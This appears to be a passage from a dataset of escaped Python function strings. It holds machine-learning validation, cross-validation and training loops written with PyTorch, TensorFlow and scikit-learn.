predictions.append(prediction[:, 0].to('cpu').numpy())\n labels.append(y[:, 0].to('cpu').numpy())\n\n # predictions and labels to numpy arrays\n predictions = np.concatenate(predictions)\n labels = np.concatenate(labels)\n\n # log the validation results if we have a tensorboard\n if tb_logger is not None:\n\n accuracy_error = 1. 
- metrics.accuracy_score(labels, predictions)\n mean_loss /= n_batches\n\n # TODO log more advanced things like confusion matrix, see\n # https://www.tensorflow.org/tensorboard/image_summaries\n\n tb_logger.add_scalar(tag=\"validation-error\",\n global_step=step,\n scalar_value=accuracy_error)\n tb_logger.add_scalar(tag=\"validation-loss\",\n global_step=step,\n scalar_value=mean_loss)\n\n # return all predictions and labels for further evaluation\n return predictions, labels", "def crossValidate(dataset, folds):\n\tshuffle(dataset)\n\tcv_results = []\n\tprecision_recall_acc = []\n\tfoldSize = int(len(dataset)/folds)\n\tfor i in range(0,len(dataset),foldSize):\n\t\t# preparing data\n\t\tvalD = dataset[i:i+foldSize]\n\t\ttestD = dataset[:i]+dataset[i+foldSize:] #list(set(dataset)-set(dataset[i:i+foldSize]))\n\t\t# Training\n\t\tprint(\"*\"*60)\n\t\tprint(\"Training on data-set size \"+str(len(testD))+\" of batch \"+str(i/(foldSize)))\n\t\tclassi = trainClassifier(testD)\n\t\t# Prediction on validation data \n\t\tprint(\"Predicting on heldout data-set size...\"+str(len(valD))+\" of batch \"+str(i/(foldSize)))\n\t\ty_true = list(map(lambda t: t[1], valD))\n\t\ty_pred = predictLabels(valD,classi)\t\t\n\t\t# Performance Metrics\t\t\n\t\t# average based on macro as it calculate metrics for each label, and find their unweighted mean.\n\t\tprecision_recall = list(precision_recall_fscore_support(y_true, y_pred, average='macro'))\n\t\tacc = accuracy_score(y_true,y_pred)\n\t\tprecision_recall[-1] = acc\n\t\tprint(precision_recall)\n\t\tprecision_recall_acc.append(precision_recall)\n\tdf = pd.DataFrame(precision_recall_acc,columns = [\"Precision\",\"Recall\",\"F1 score\",\"Accuracy Score\"])\n\tprint(df)\n\tcv_results = df.mean().tolist()\n\treturn cv_results", "def visualization(epochs, mse_tr, mse_te):\n plt.semilogx(epochs, mse_tr, marker=\".\", color='b', label='train error')\n plt.semilogx(epochs, mse_te, marker=\".\", color='r', label='test error')\n plt.xlabel(\"k\")\n plt.ylabel(\"rmse\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig(\"cross_validation\")", "def run_CV(X,y,model,func, n_splits = 3, how = 'up', categorical = 'label_encoder'):\n logloss = []\n skf = StratifiedKFold(n_splits = n_splits, random_state = 144)\n for i, (train_idx, val_idx) in enumerate(skf.split(X,y)):\n X_train, X_val = X.iloc[train_idx], X.iloc[val_idx]\n y_train, y_val = y[train_idx], y[val_idx]\n\n # # SMOTE\n # X_train = X_train.drop('poor', axis = 1) # drop target\n # cat_columns = X_train.select_dtypes(['object']).columns\n # X_train[cat_columns] = X_train[cat_columns].apply(LabelEncoder().fit_transform)\n # orig_cols = X_train.columns # SMOTE will return a numpy array. 
Store the column names here to recreate the dataframe for feature engineering/transforms below\n # X_train, y_train = SMOTE().fit_sample(X_train,y_train)\n # # recreate dataframe\n # X_train = pd.DataFrame(X_train, columns = orig_cols)\n\n if how is not None:\n # resample to balance data\n X_resampled = resample_data(X_train, how = how)\n # store the targets now that they are balanced\n y_train = X_resampled['poor']\n # drop target from train\n X_train = X_resampled.drop('poor', axis = 1)\n X_val.drop('poor', axis = 1, inplace = True)\n # print(X_val.columns.values)\n ####### feature engineering goes blow this comment:\n \n func(X_train)\n func(X_val)\n \n ###### end feature eng\n X_train = pre_process_data(X_train, normalize_num='standardize', categorical = categorical)\n assert X_train.shape[0] == y_train.shape[0]\n\n model.fit(X_train, y_train)\n # standardize X_val to predict\n X_val = pre_process_data(X_val,normalize_num= 'standardize', enforce_cols=X_train.columns, categorical = categorical)\n preds = model.predict_proba(X_val)\n \n logloss.append(log_loss(y_val, preds[:,1]))\n \n return logloss", "def run_cross_validation_process_test(info_string, models):\n\n batch_size = 64\n num_fold = 0\n yfull_test = []\n x_test_id = []\n nfolds = len(models)\n\n datagen_test = ImageDataGenerator(\n featurewise_center=True,\n featurewise_std_normalization=True,\n preprocessing_function=pre_processing_image\n )\n\n # print(image_array.shape)\n x_test, x_test_id = load_images_test()\n print(len(x_test))\n image_test_array = np.asarray(x_test, dtype=np.float32)\n start_time = time.time()\n print(\"Datagen.fit started\")\n datagen_test.fit(image_test_array, augment=False)\n print('Fit Completed: {} seconds'.format(round(time.time() - start_time, 2)))\n\n for i in range(nfolds):\n model = models[i]\n num_fold += 1\n print('Start KFold number {} from {}'.format(num_fold, nfolds))\n\n #test_prediction = model.predict_generator(generator=datagen_test.fit(image_test_array, seed=79),\n # steps=len(image_test_array)/32, max_q_size=20, workers=8, verbose=1)\n\n test_prediction = model.predict(image_test_array, batch_size=batch_size, verbose=1)\n\n yfull_test.append(test_prediction)\n\n test_res = merge_several_folds_mean(yfull_test, nfolds)\n info_string = 'loss_' + info_string \\\n + '_folds_' + str(nfolds)\n create_submission(test_res, x_test_id, info_string)\n d=pd.DataFrame(test_res,columns=FISH_CLASSES)", "def validation_classification(model, val_dataloader, epoch, criterion, cfg,\n writer):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n model.eval()\n\n end = time.time()\n with torch.no_grad():\n for step, data in enumerate(val_dataloader):\n data_time.update(time.time() - end)\n val_batch = data[0].cuda()\n val_label = data[1].cuda()\n outputs = model(val_batch)\n\n loss = criterion(outputs, val_label)\n if cfg.CONFIG.DATA.NUM_CLASSES < 5:\n prec1a, prec5a = accuracy(outputs.data, val_label, topk=(1, 1))\n # Tricky solution for datasets with less than 5 classes, top5 acc is always set to 100%\n prec5a = 100\n else:\n prec1a, prec5a = accuracy(outputs.data, val_label, topk=(1, 5))\n\n losses.update(loss.item(), val_batch.size(0))\n top1.update(prec1a.item(), val_batch.size(0))\n top5.update(prec5a.item(), val_batch.size(0))\n batch_time.update(time.time() - end)\n end = time.time()\n\n if step % cfg.CONFIG.LOG.DISPLAY_FREQ == 0 and cfg.DDP_CONFIG.GPU_WORLD_RANK == 0:\n logger.info('----validation----')\n 
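Several of the validation loops in these entries track running statistics with an AverageMeter-style helper; a minimal, framework-free sketch of that pattern (names here are illustrative):

class AverageMeter:
    """Tracks the running average of a scalar metric (loss, accuracy, ...)."""

    def __init__(self):
        self.val = 0.0   # last recorded value
        self.sum = 0.0   # weighted sum of all recorded values
        self.count = 0   # total weight, e.g. number of samples seen
        self.avg = 0.0   # running average

    def update(self, val, n=1):
        self.val = val
        self.sum += val * n
        self.count += n
        self.avg = self.sum / self.count

# usage: meter = AverageMeter(); meter.update(batch_loss, batch_size); print(meter.avg)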
print_string = 'Epoch: [{0}][{1}/{2}]'.format(\n epoch, step + 1, len(val_dataloader))\n logger.info(print_string)\n print_string = 'data_time: {data_time:.3f}, batch time: {batch_time:.3f}'.format(\n data_time=data_time.val, batch_time=batch_time.val)\n logger.info(print_string)\n print_string = 'loss: {loss:.5f}'.format(loss=losses.avg)\n logger.info(print_string)\n print_string = 'Top-1 accuracy: {top1_acc:.2f}%, Top-5 accuracy: {top5_acc:.2f}%'.format(\n top1_acc=top1.avg, top5_acc=top5.avg)\n logger.info(print_string)\n\n eval_path = cfg.CONFIG.LOG.EVAL_DIR\n if not os.path.exists(eval_path):\n os.makedirs(eval_path)\n\n with open(\n os.path.join(eval_path,\n \"{}.txt\".format(cfg.DDP_CONFIG.GPU_WORLD_RANK)),\n 'w') as f:\n f.write(\"{} {} {}\\n\".format(losses.avg, top1.avg, top5.avg))\n torch.distributed.barrier()\n\n loss_lst, top1_lst, top5_lst = [], [], []\n if cfg.DDP_CONFIG.GPU_WORLD_RANK == 0 and writer is not None:\n print(\"Collecting validation numbers\")\n for x in range(cfg.DDP_CONFIG.GPU_WORLD_SIZE):\n data = open(os.path.join(\n eval_path,\n \"{}.txt\".format(x))).readline().strip().split(\" \")\n data = [float(x) for x in data]\n loss_lst.append(data[0])\n top1_lst.append(data[1])\n top5_lst.append(data[2])\n print(\"Global result:\")\n print_string = 'loss: {loss:.5f}'.format(loss=np.mean(loss_lst))\n print(print_string)\n print_string = 'Top-1 accuracy: {top1_acc:.2f}%, Top-5 accuracy: {top5_acc:.2f}%'.format(\n top1_acc=np.mean(top1_lst), top5_acc=np.mean(top5_lst))\n print(print_string)\n writer.add_scalar('val_loss_epoch', np.mean(loss_lst), epoch)\n writer.add_scalar('val_top1_acc_epoch', np.mean(top1_lst), epoch)\n writer.add_scalar('val_top5_acc_epoch', np.mean(top5_lst), epoch)", "def __call__(self, targets, logits, seq_length):\n\t\t# Clean spectograms of sources\n\t\tspectrogram_targets = targets['multi_targets']\n\n\t\t# Spectogram of the original mixture, used to mask for scoring\n\t\tmix_to_mask = targets['mix_to_mask']\n\n\t\t# Length of sequences\n\t\tseq_length = seq_length['bin_emb']\n\t\t# Logits (=output network)\n\t\temb_vec = logits['bin_emb']\n\t\tanchors = logits['anchors']\n\n\t\tif 'speaker_logits' in logits:\n\t\t\t# Assuming dimensions are B x T x S\n\t\t\tspeaker_logits = logits['speaker_logits']\n\t\t\tav_speaker_logits_time_flag = self.lossconf['av_speaker_logits_time_flag'] == 'True'\n\t\telse:\n\t\t\tspeaker_logits = None\n\n\t\tif 'anchors_scale' in logits:\n\t\t\t# Assuming dimensions are B x T x S\n\t\t\tanchors_scale = logits['anchors_scale']\n\t\t\tanchors_scale = anchors_scale[0, 0]\n\t\telse:\n\t\t\tanchors_scale = None\n\n\t\ttime_anchors_flag = self.lossconf['time_anchors_flag'] == 'True'\n\t\tav_anchors_time_flag = (self.lossconf['av_anchors_time_flag'] == 'True') and time_anchors_flag\n\t\tactivation = self.lossconf['activation']\n\t\tnormalize_embs = self.lossconf['normalize_embs'] == 'True'\n\t\tnormalize_anchors = self.lossconf['normalize_anchors'] == 'True'\n\t\tif 'do_square' in self.lossconf:\n\t\t\tdo_square = self.lossconf['do_square'] == 'True'\n\t\telse:\n\t\t\tdo_square = True\n\n\t\twith tf.name_scope('anchor_deepattractornet_loss'):\n\n\t\t\tfeat_dim = spectrogram_targets.get_shape()[2]\n\t\t\temb_dim = anchors.get_shape()[-1]\n\t\t\ttime_dim = tf.shape(anchors)[1]\n\t\t\tnrS = spectrogram_targets.get_shape()[3]\n\n\t\t\tV = tf.reshape(emb_vec, [self.batch_size, -1, feat_dim, emb_dim], name='V') # dim: (B x T x F x D)\n\t\t\tif normalize_embs:\n\t\t\t\tV = V / (tf.norm(V, axis=-1, keepdims=True) + 
1e-12)\n\t\t\ttime_dim = tf.shape(V)[1]\n\n\t\t\tif not time_anchors_flag:\n\t\t\t\tanchors = tf.tile(tf.expand_dims(tf.expand_dims(anchors, 0), 0), [self.batch_size, time_dim, 1, 1]) # dim: (B x T x S x D)\n\n\t\t\tif normalize_anchors:\n\t\t\t\tanchors = anchors / (tf.norm(anchors, axis=-1, keepdims=True) + 1e-12)\n\n\t\t\tif speaker_logits is not None:\n\t\t\t\tspeaker_logits = tf.expand_dims(speaker_logits, -1)\n\t\t\t\tif av_speaker_logits_time_flag:\n\t\t\t\t\tspeaker_logits = tf.reduce_mean(speaker_logits, 1, keepdims=True)\n\t\t\t\tanchors *= speaker_logits\n\n\t\t\tif anchors_scale is not None:\n\t\t\t\tanchors *= anchors_scale\n\n\t\t\tif av_anchors_time_flag:\n\t\t\t\tanchors = tf.reduce_mean(anchors, axis=1, keepdims=True)\n\t\t\t\tanchors = tf.tile(anchors, [1, time_dim, 1, 1])\n\n\t\t\tprod_1 = tf.matmul(V, anchors, transpose_a=False, transpose_b=True, name='AVT')\n\n\t\t\tif activation == 'softmax':\n\t\t\t\tmasks = tf.nn.softmax(prod_1, axis=-1, name='M') # dim: (B x T x F x nrS)\n\t\t\telif activation in ['None', 'none', None]:\n\t\t\t\tmasks = prod_1\n\t\t\telif activation == 'sigmoid':\n\t\t\t\tmasks = tf.nn.sigmoid(prod_1, name='M')\n\t\t\telse:\n\t\t\t\tmasks = tf.nn.sigmoid(prod_1, name='M')\n\n\t\t\tX = tf.expand_dims(mix_to_mask, -1, name='X') # dim: (B x T x F x 1)\n\t\t\treconstructions = tf.multiply(masks, X) # dim: (B x T x F x nrS)\n\t\t\treconstructions = tf.transpose(reconstructions, perm=[3, 0, 1, 2]) # dim: (nrS x B x T x F)\n\n\t\t\tS = tf.transpose(spectrogram_targets, [3, 0, 1, 2]) # nrS x B x T x F\n\n\t\t\tif 'vad_targets' in targets:\n\t\t\t\toverlap_weight = float(self.lossconf['overlap_weight'])\n\t\t\t\tvad_sum = tf.reduce_sum(targets['vad_targets'], -1)\n\t\t\t\tbin_weights = tf.where(\n\t\t\t\t\tvad_sum > 1,\n\t\t\t\t\ttf.ones([self.batch_size, time_dim]) * overlap_weight,\n\t\t\t\t\ttf.ones([self.batch_size, time_dim]))\n\t\t\t\tbin_weights = tf.expand_dims(bin_weights, -1) # broadcast the frame weights to all bins\n\t\t\t\tnorm = tf.reduce_sum(bin_weights) * tf.to_float(feat_dim)\n\t\t\telse:\n\t\t\t\tbin_weights = None\n\t\t\t\tnorm = tf.to_float(tf.reduce_sum(seq_length) * feat_dim)\n\n\t\t\tloss = ops.base_pit_loss(reconstructions, S, bin_weights=bin_weights, overspeakererized=False, do_square=do_square)\n\n\t\treturn loss, norm", "def eval_epoch(model,\n validation_data,\n device\n ):\n\n model.eval()\n\n total_loss = 0\n kl_total_loss = 0\n n_word_total = 0\n n_syn_correct_total = 0\n n_lvl_correct_total = 0\n\n with torch.no_grad():\n for batch in tqdm(\n validation_data, desc=' [Validation] ', leave=True):\n # prepare data\n src_syn, src_lvl, src_pos, src_lengths, src_path_mask, \\\n tmpl_syn, tmpl_lvl, tmpl_pos, tmpl_lengths, tmpl_path_mask, \\\n tgt_syn, tgt_lvl, tgt_pos, tgt_lengths, _ = map(lambda x: x.to(device), batch)\n syn_gold_insts = tgt_syn[:, 1:]\n lvl_gold_insts = tgt_lvl[:, 1:]\n\n # forward\n syn_pred, lvl_pred, _ = model(\n src_syn_seqs=src_syn,\n src_lvl_seqs=src_lvl,\n src_pos_seqs=src_pos,\n src_path_masks=src_path_mask,\n tmpl_syn_seqs=tmpl_syn,\n tmpl_lvl_seqs=tmpl_lvl,\n tmpl_pos_seqs=tmpl_pos,\n tmpl_path_masks=tmpl_path_mask,\n tgt_syn_seqs=tgt_syn,\n tgt_lvl_seqs=tgt_lvl,\n tgt_pos_seqs=tgt_pos\n )\n\n # metrics\n syn_reconstruction_loss = cal_nll_loss(syn_pred, syn_gold_insts)\n lvl_reconstruction_loss = cal_nll_loss(lvl_pred, lvl_gold_insts)\n kl_loss = 0\n loss = syn_reconstruction_loss + lvl_reconstruction_loss + kl_loss\n\n n_syn_correct = cal_accuracy(syn_pred, syn_gold_insts)\n n_lvl_correct = 
cal_accuracy(lvl_pred, lvl_gold_insts)\n\n # note keeping\n total_loss += loss.item()\n kl_total_loss += kl_loss\n\n non_pad_mask = lvl_gold_insts.ne(Constants.PAD)\n n_word = non_pad_mask.sum().item()\n n_word_total += n_word\n n_syn_correct_total += n_syn_correct\n n_lvl_correct_total += n_lvl_correct\n\n loss_per_word = total_loss / n_word_total\n kl_loss_per_word = kl_total_loss / n_word_total\n syn_accuracy = n_syn_correct_total / n_word_total\n lvl_accuracy = n_lvl_correct_total / n_word_total\n return loss_per_word, kl_loss_per_word, syn_accuracy, lvl_accuracy", "def validate(validateloader, model, batch_size, epoch, iterations,\n criterion_cls=None, class_nms=None,\n criterion_ofs=None, offset_list=None,\n print_freq=10, log_freq=1000, tensorboard=True, score=False, alpha=1):\n model.eval()\n if criterion_cls:\n n_classes = len(class_nms)\n cls_losses = AverageMeter()\n if score:\n score_metrics = runningScore(n_classes, class_nms)\n if criterion_ofs:\n ofs_losses = AverageMeter()\n if score:\n offset_metrics = offsetIoU(offset_list)\n all_losses = AverageMeter()\n batch_time = AverageMeter()\n\n end = time.time()\n for i, (img, target) in enumerate(validateloader):\n\n with torch.no_grad():\n img = img.cuda()\n target = target.cuda()\n if criterion_cls:\n class_target = target[:, :n_classes, :, :]\n if criterion_ofs:\n ofs_target = target[:, n_classes:, :, :]\n elif criterion_ofs:\n ofs_target = target\n\n prediction = model(img) # forward network\n\n if criterion_cls:\n class_pred = prediction[:, :n_classes, :, :]\n if criterion_ofs:\n ofs_pred = prediction[:, n_classes:, :, :]\n elif criterion_ofs:\n ofs_pred = prediction\n\n if criterion_cls:\n cls_loss = criterion_cls(class_pred, class_target)\n cls_losses.update(cls_loss.item(), batch_size)\n if criterion_ofs:\n ofs_loss = criterion_ofs(ofs_pred, ofs_target)\n ofs_losses.update(ofs_loss.item(), batch_size)\n\n if criterion_cls and criterion_ofs: # both case\n all_loss = cls_loss + alpha * ofs_loss\n elif criterion_cls: # class only case\n all_loss = cls_loss\n elif criterion_ofs: # offset only case\n all_loss = ofs_loss\n\n all_losses.update(all_loss.item(), batch_size)\n\n if criterion_cls and score:\n score_metrics.update(\n torch.sigmoid(class_pred), class_target)\n if criterion_ofs and score:\n offset_metrics.update(\n torch.sigmoid(ofs_pred), ofs_target)\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n if i % print_freq == 0:\n print('Val: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'.format(\n epoch, i, len(validateloader), batch_time=batch_time))\n\n # log to TensorBoard\n if tensorboard:\n if criterion_cls:\n log_value('val_cls_loss', cls_losses.avg,\n int(iterations / log_freq))\n if criterion_ofs:\n log_value('val_ofs_loss', ofs_losses.avg,\n int(iterations / log_freq))\n\n if criterion_cls and score:\n scores, class_iou = score_metrics.get_scores()\n mean_cls_iou = scores['mean_IU']\n if tensorboard:\n log_value('val_iou', mean_cls_iou, epoch)\n score_metrics.print_stat()\n\n if criterion_ofs and score:\n iou, mean_ofs_iou = offset_metrics.get_scores()\n if tensorboard:\n log_value('val_ofs_miou', mean_ofs_iou, epoch)\n log_value('val_ofs_1_iou', iou[0], epoch)\n log_value('val_ofs_2_iou', iou[1], epoch)\n offset_metrics.print_stat()\n\n if criterion_cls and criterion_ofs:\n mean_iou = mean_cls_iou + mean_ofs_iou\n elif criterion_cls:\n mean_iou = mean_cls_iou\n elif criterion_ofs:\n mean_iou = mean_ofs_iou\n\n return mean_iou", "def 
validate(model,val_dataloader,loss_fn):\n model.eval()\n total_loss = 0\n \n for batch_index, batch in enumerate(val_dataloader):\n batch = batch[0].view(-1,1,28,28).float()\n output_batch = model(batch)\n total_loss += loss_fn(batch, output_batch, model.prev_means, model.prev_vars)\n\n total_loss *= float(val_dataloader.batch_size) / len(val_dataloader.dataset)\n return total_loss", "def tenfold_cross_validation(X, y):\n\n i = 0\n x_score = []\n y_score = []\n\n for i in range(1, 11):\n for train_index, test_index in KFold(10).split(X):\n x_train, x_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n\n # change the parameters to see how each parameter affects the l1inear classifier\n linear_classifier = linear_model.SGDClassifier(max_iter=1000, tol=1e-3)\n\n # start training the classifier\n linear_classifier.fit(x_train, y_train)\n\n # create and plot the confusion matrix\n # cross validation done with cross_val_\n y_train_pred = cross_val_predict(linear_classifier, x_test, y_test, cv=10)\n\n print(\"\\n Statistics and Confusion matrix obtained with pandas_ml: \\n\")\n cm = ConfusionMatrix(y_test, y_train_pred)\n stats = cm.stats()\n\n file = open(\"linear_classification_9000_cross_validation_\" + str(i) + \".txt\", \"w\")\n file.write(str(stats))\n file.close()\n\n # cm.print_stats()\n # print confusion matrix\n cm.plot(normalized=True)\n plt.show()", "def validation(model, val_loader, device, writer, iterator, log_path, includeHeading):\r\n model.eval()\r\n total_loss = 0.0\r\n \r\n numBatches = len(val_loader)\r\n final = False\r\n start = True\r\n \r\n # for each batch\r\n with torch.no_grad():\r\n for i, data in enumerate(val_loader, 0):\r\n \r\n data = data.to(device)\r\n \r\n # If first or last batch \r\n if i == 1:\r\n start = False\r\n \r\n if i+1 == numBatches:\r\n final = True\r\n \r\n # Apply model to data\r\n prediction = model(data, final, start)\r\n \r\n # Calculate loss of the batch\r\n prediction = torch.clamp(prediction, 0, 255, out=None)\r\n loss = torch.nn.functional.mse_loss(prediction, data.y)\r\n total_loss += loss.item()\r\n \r\n # Dump images from first batch\r\n if i == 0:\r\n \r\n # Retransform to images\r\n y_predict = retransformToImage(prediction.cpu().detach().numpy(), includeHeading)\r\n y_true = retransformToImage(data.y.cpu().detach().numpy(), includeHeading)\r\n \r\n # Dump images\r\n writer.write_image(y_predict, iterator, if_predict=True, includeHeading = includeHeading)\r\n writer.write_image(y_true, iterator, if_predict=False, includeHeading = includeHeading)\r\n \r\n # Print and dump Total validation loss \r\n valLoss = total_loss / len(val_loader)\r\n print(\"Validation loss = {:.2f}\".format(valLoss))\r\n # write the validation loss to tensorboard\r\n writer.write_loss_validation(valLoss, iterator)\r\n \r\n pickle.dump(valLoss, open(os.path.join(log_path,'valLoss.data'), 'wb'))\r\n \r\n return valLoss", "def validate(val_loader, model, epoch, cfg):\n batch_time = meter.TimeMeter(True)\n data_time = meter.TimeMeter(True)\n prec = meter.ClassErrorMeter(topk=[1], accuracy=True)\n\n # testing mode\n model.eval()\n\n for i, (shapes, labels) in enumerate(val_loader):\n batch_time.reset()\n # bz x 12 x 3 x 224 x 224\n labels = labels.long().view(-1)\n shapes = Variable(shapes)\n labels = Variable(labels)\n\n # shift data to GPU\n if cfg.cuda:\n shapes = shapes.cuda()\n labels = labels.cuda()\n\n # forward, backward optimize\n preds = model(shapes)\n\n if cfg.have_aux:\n preds, aux = preds\n\n prec.add(preds.data, 
labels.data)\n\n if i % cfg.print_freq == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Batch Time {batch_time:.3f}\\t'\n 'Epoch Time {data_time:.3f}\\t'\n 'Prec@1 {top1:.3f}\\t'.format(\n epoch, i, len(val_loader), batch_time=batch_time.value(),\n data_time=data_time.value(), top1=prec.value(1)))\n\n print('mean class accuracy at epoch {0}: {1} '.format(epoch, prec.value(1)))\n\n return prec.value(1)", "def cross_validate(featureFile, nFolds, verbosity = False, percentTData = 1., extype='attribution'):\n oData,aData = importC5(featureFile)\n nAuthors = len(set(aData))\n if extype == 'attribution' and np.mean(Counter(aData).values()) != Counter(aData).values()[0]:\n print('Number of docs per author should be equal in attribution experiment')\n docsPerFold = len(oData) / nFolds\n cMatrix = np.zeros( (nAuthors, nAuthors) )\n\n for N in range(0,nFolds):\n testAuthors = list()\n trainAuthors= list()\n testData = list()\n trainData = list()\n for idv in range(0,len(oData)):\n if (N+idv) % nFolds == 0:\n testData.append(oData[idv])\n testAuthors.append(aData[idv])\n else:\n trainData.append(oData[idv])\n trainAuthors.append(aData[idv]) \n teFile = '%s.cvtest' % (os.path.splitext(featureFile)[0])\n trFile = '%s.cvtrain' % (os.path.splitext(featureFile)[0])\n tAmount = int(round(len(trainAuthors) * percentTData)) # limit training data\n exportFoldFile(testData, testAuthors, teFile)\n exportFoldFile(trainData[0:tAmount], trainAuthors[0:tAmount], trFile)\n predict = classify(trFile, teFile, len(oData[0]))\n if extype != 'attribution':\n cMatrix += confusionMatrix(testAuthors, predict, extype)\n os.remove(teFile)\n os.remove(trFile)\n if percentTData != 1.0: print('Ran CV only with %.f %% (%d docs) of training data.' % (percentTData * 100, tAmount))\n return cMatrix", "def test():\r\n le = preprocessing.LabelEncoder()\r\n le.fit([\"Door Knocking\",\"Shower Running\",\"Toilet Flushing\",\"Vacuum Cleaning\",\"Keyboard Typing\", # encode class labels as numeric id values\r\n \"Coughing\",\"Neutral\"])\r\n \r\n if torch.cuda.is_available():\r\n device = \"cuda:0\"\r\n use_cuda = True\r\n else:\r\n device = \"cpu\"\r\n use_cuda = False\r\n \r\n myModel, start_epoch, train_hist = loadCheckpoint(31, use_cuda)\r\n \r\n #myModel = myModel.double()\r\n myModel = myModel.to(device, dtype=torch.double)\r\n next(myModel.parameters()).device # Check that it is on Cuda\r\n \r\n file_names = []\r\n class_ids = []\r\n max_s = 1\r\n sr = 44100 \r\n for entry in os.scandir(\"test wavs/\"): # for each folder corresponding to a class in dataset\r\n class_id = entry.name # get class numeric id according to label encoder\r\n relative_path = \"test wavs/\"+entry.name # get path location of data sample for loading audio\r\n file_names.append(relative_path) # append to list\r\n class_ids.append(class_id)\r\n\r\n max_s = 1\r\n sr = 44100\r\n X_test = [] \r\n for i in range(len(file_names)):\r\n audio = LoadAudio.load(file_names[i]) # load audio file\r\n audio = LoadAudio.resample(audio, sr) # resample audio\r\n audio = LoadAudio.mono(audio) # make audio stereo\r\n audio = LoadAudio.resize(audio, max_s) # resize audio \r\n sgram = LoadAudio.spectrogram(audio, n_mels=128, n_fft=1024, hop_len=None) # create spectrogram \r\n sgram = LoadAudio.hpssSpectrograms(audio,sgram)\r\n sgram_tensor = torch.tensor(sgram)\r\n X_test.append(sgram_tensor)\r\n\r\n pred = np.array([])\r\n for i in range(len(X_test)):\r\n inputs = X_test[i]\r\n # Normalize the inputs\r\n inputs_m, inputs_s = inputs.mean(), inputs.std()\r\n inputs = (inputs - inputs_m) 
/ inputs_s\r\n inputs = inputs.unsqueeze(0)\r\n inputs = inputs.double()\r\n \r\n # Get predictions\r\n outputs = myModel(inputs)\r\n\r\n # Get the predicted class with the highest score\r\n _, predicted = torch.max(outputs.data, 1)\r\n \r\n pred = np.append(pred, le.inverse_transform(predicted.detach().cpu().numpy()))\r\n \r\n\r\n df = pd.DataFrame(pred, columns=[\"Predicted\"]) # save predictions as a datafram column\r\n df['True'] = class_ids # save true class as a datafram column\r\n print(\"\\nPredicted:\", df)", "def train(self, lr=0.001, clip=5, val_frac=0.1, print_every=10):\n df = pandas.DataFrame(columns=['Epoch', 'Step', 'Last Train Loss', 'Mean Test Loss'])\n self.timer.start()\n self.model.train()\n\n if self.model.train_on_gpu:\n self.model.cuda()\n\n counter = 0\n h = None\n for e in range(self.epochs):\n if h is None: # initialize hidden state\n h = self.model.init_hidden(self.reader.batch_size)\n\n for x, y in self.reader.get_train_data(): # get_batches(data, batch_size, seq_length):\n counter += 1\n inputs, targets = torch.from_numpy(x), torch.from_numpy(y)\n\n if self.model.train_on_gpu:\n inputs, targets = inputs.cuda(), targets.cuda()\n\n # Creating new variables for the hidden state, otherwise\n # we'd backprop through the entire training history\n h = tuple([each.data for each in h])\n\n # zero accumulated gradients\n self.model.zero_grad()\n # get the output from the model -\n output, h = self.model(inputs, h) # Input Should Be 3-Dimensional: seq_len, batch, input_size\n # calculate the loss and perform back propagation\n loss = self.criterion(output, targets.view(self.reader.batch_size * self.reader.sequence_length))\n loss.backward()\n # `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.\n nn.utils.clip_grad_norm_(self.model.parameters(), clip)\n self.optimizer.step()\n\n # loss stats\n if counter % print_every == 0:\n # Get validation loss\n val_h = self.model.init_hidden(self.reader.batch_size)\n val_losses = []\n self.model.eval()\n for x, y in self.reader.get_test_data(): # get_batches(val_data, batch_size, seq_length):\n\n x, y = torch.from_numpy(x), torch.from_numpy(y)\n\n # Creating new variables for the hidden state, otherwise\n # we'd backprop through the entire training history\n val_h = tuple([each.data for each in val_h])\n\n inputs, targets = x, y\n if self.model.train_on_gpu:\n inputs, targets = inputs.cuda(), targets.cuda()\n\n output, val_h = self.model(inputs, val_h)\n val_loss = self.criterion(output, targets.view(self.reader.batch_size * self.reader.sequence_length))\n\n val_losses.append(val_loss.item())\n\n self.model.train() # reset to train mode after iterationg through validation data\n print(\"Epoch: {}/{}...\".format(e + 1, self.epochs),\n \"Step: {}...\".format(counter),\n \"Loss: {:.4f}...\".format(loss.item()),\n \"Val Loss: {:.4f}\".format(np.mean(val_losses)))\n df = df.append({\n 'Epoch': \"{}/{}\".format(e + 1, self.epochs),\n 'Step': counter,\n 'Last Train Loss': loss.item(),\n 'Mean Test Loss': np.mean(val_losses)\n }, ignore_index=True)\n self.timer.stop()\n self.save_model()\n date = DateHelper.get_current_date()\n Export.append_df_to_excel(df, date)\n Export.append_df_to_excel(self.get_info(), date)", "def cross_valid(self, validation=True):\n for raw_model in self.models:\n train_accs = []\n test_accs = []\n valid_accs = []\n train_aucs = []\n test_aucs = []\n valid_aucs = []\n durations = []\n\n for i in range(self.reader.folds):\n if not validation:\n train_data, train_labels, test_data, 
test_labels = self.reader.read_train_test_fold(i)\n else:\n train_data, train_labels, test_data, test_labels, valid_data, valid_labels = \\\n self.reader.read_train_test_valid_fold(i)\n\n model = copy.deepcopy(raw_model)\n\n t1 = time.time()\n model.fit(train_data, train_labels)\n train_time = int(time.time() - t1)\n durations.append(train_time)\n\n train_predict_probs = model.predict_proba(train_data)\n test_predict_probs = model.predict_proba(test_data)\n if validation:\n valid_predict_probs = model.predict_proba(valid_data)\n\n # some model outputs probabilities for both classes. we only need probs for positive class.\n if len(train_predict_probs.shape) > 1:\n train_predict_probs = train_predict_probs[:, 1]\n if len(test_predict_probs.shape) > 1:\n test_predict_probs = test_predict_probs[:, 1]\n if validation and len(valid_predict_probs.shape) > 1:\n valid_predict_probs = valid_predict_probs[:, 1]\n\n train_auc = self.get_auc(train_labels, train_predict_probs)\n train_aucs.append(train_auc)\n test_auc = self.get_auc(test_labels, test_predict_probs)\n test_aucs.append(test_auc)\n if validation:\n valid_auc = self.get_auc(valid_labels, valid_predict_probs)\n valid_aucs.append(valid_auc)\n\n train_acc = self.get_acc(train_labels, train_predict_probs)\n train_accs.append(train_acc)\n test_acc = self.get_acc(test_labels, test_predict_probs)\n test_accs.append(test_acc)\n if validation:\n valid_acc = self.get_acc(valid_labels, valid_predict_probs)\n 